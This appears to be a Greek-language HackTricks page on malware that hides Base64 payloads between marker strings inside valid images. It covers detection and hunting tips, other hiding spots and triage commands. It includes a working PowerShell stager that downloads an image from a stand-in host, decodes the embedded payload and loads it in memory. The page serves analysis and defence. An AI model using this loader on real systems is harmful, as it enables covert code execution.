Malware & Network Stego

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

Δεν είναι όλα τα steganography pixel LSB; το commodity malware συχνά κρύβει payloads μέσα σε αρχεία που διαφορετικά είναι έγκυρα.

Πρακτικά μοτίβα

Marker-delimited payloads σε έγκυρες εικόνες

Εάν μια εικόνα κατεβαίνει και αμέσως αναλύεται ως text/Base64 από ένα script, το payload συχνά είναι marker-delimited παρά pixel-hidden.

Commodity loaders όλο και περισσότερο κρύβουν Base64 payloads ως plain text μέσα σε αλλιώς έγκυρες εικόνες (συχνά GIF/PNG). Αντί για pixel-level LSB, το payload οριοθετείται από μοναδικά marker strings ενσωματωμένα στο text/metadata του αρχείου. Ένας stager στη συνέχεια:

• Κατεβάζει την εικόνα μέσω HTTP(S)
• Εντοπίζει τα start/end markers
• Εξάγει το κείμενο μεταξύ των markers και το Base64-decodes
• Φορτώνει/εκτελεί στη μνήμη

Ελάχιστο PowerShell carving snippet:

$img = (New-Object Net.WebClient).DownloadString('https://example.com/p.gif')
$start = '<<sudo_png>>'; $end = '<<sudo_odt>>'
$s = $img.IndexOf($start); $e = $img.IndexOf($end)
if($s -ge 0 -and $e -gt $s){
$b64 = $img.Substring($s + $start.Length, $e - ($s + $start.Length))
$bytes = [Convert]::FromBase64String($b64)
[Reflection.Assembly]::Load($bytes) | Out-Null
}

Σημειώσεις:

• ATT&CK: T1027.003 (steganography)
• Detection/hunting:
• Σαρώστε τις ληφθείσες εικόνες για συμβολοσειρές διαχωριστών.
• Επισημάνετε scripts που φέρνουν εικόνες και αμέσως καλούν routines αποκωδικοποίησης Base64 (PowerShell FromBase64String, JS atob, κ.λπ.).
• Αναζητήστε ασυμφωνίες στο HTTP content-type (image/* response αλλά το σώμα περιέχει μεγάλες ASCII/Base64).

Άλλα σημεία υψηλού σήματος για απόκρυψη payloads

Αυτά συνήθως ελέγχονται πιο γρήγορα από το content-level pixel stego:

• Μεταδεδομένα: EXIF/XMP/IPTC, PNG tEXt/iTXt/zTXt, JPEG COM/APPn τμήματα.
• Τελικά bytes: δεδομένα προσαρτημένα μετά τον επίσημο δείκτη τέλους (π.χ., μετά το PNG IEND).
• Ενσωματωμένα archives: ένα ZIP/7z ενσωματωμένο ή προσαρτημένο και εξαγόμενο από τον loader.
• Polyglots: αρχεία κατασκευασμένα να είναι έγκυρα σε πολλαπλούς parsers (π.χ., image + script + archive).

Εντολές Triage

file sample
exiftool -a -u -g1 sample
strings -n 8 sample | head
binwalk sample
binwalk -e sample

Αναφορές:

• Παράδειγμα Unit 42: https://unit42.paloaltonetworks.com/phantomvai-loader-delivers-infostealers/
• MITRE ATT&CK: https://attack.mitre.org/techniques/T1027/003/
• Polyglots μορφών αρχείων και κόλπα με containers: https://github.com/corkami/docs
• Aperi’Solve (web-based stego triage): https://aperisolve.com/

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.